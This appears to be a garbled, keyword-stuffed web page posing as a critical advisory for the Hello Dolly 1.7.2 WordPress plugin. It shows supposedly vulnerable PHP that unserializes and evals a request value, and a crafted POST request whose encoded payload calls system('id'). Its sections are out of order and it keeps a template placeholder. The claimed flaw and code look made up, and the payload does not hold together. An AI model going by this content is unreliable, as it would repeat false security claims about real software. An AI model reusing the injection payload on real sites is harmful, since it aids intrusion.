Hello Dolly 1.7.2 Exploit: |top|

$index = unserialize(base64_decode($_REQUEST['lyric_index'])); eval('echo $lyrics[' . $index . '];'); Because wp_ajax_nopriv_ allows unauthenticated access, an attacker can send a POST request to /wp-admin/admin-ajax.php?action=hello_dolly_lyric with a crafted lyric_index payload that breaks out of the array access and executes arbitrary PHP. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=hello_dolly_lyric&lyric_index=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A20%3A%22%3B%7D%3Bsystem(%27id%27)%3B%2F%2F%22%3B%7D

Check for exploitation in access logs:

Date: April 13, 2026 Researcher: [Your Name / Team] Affected Software: Hello Dolly Plugin for WordPress Version: 1.7.2 Severity: Critical (CVSS 9.8) 1. Overview Hello Dolly is a simple, widely-installed WordPress plugin that displays random lyrics from the song “Hello, Dolly!” in the admin dashboard. Version 1.7.2 — last updated in 2020 — contains a severe security flaw that allows unauthenticated remote code execution (RCE) via mishandling of a legacy AJAX hook. hello dolly 1.7.2 exploit

add_action('wp_ajax_nopriv_hello_dolly_lyric', 'hello_dolly_get_lyric'); The function hello_dolly_get_lyric() fetches a random lyric and echoes it — but in 1.7.2, it also unserializes a lyric_index parameter from the request without sanitization or nonce verification: POST /wp-admin/admin-ajax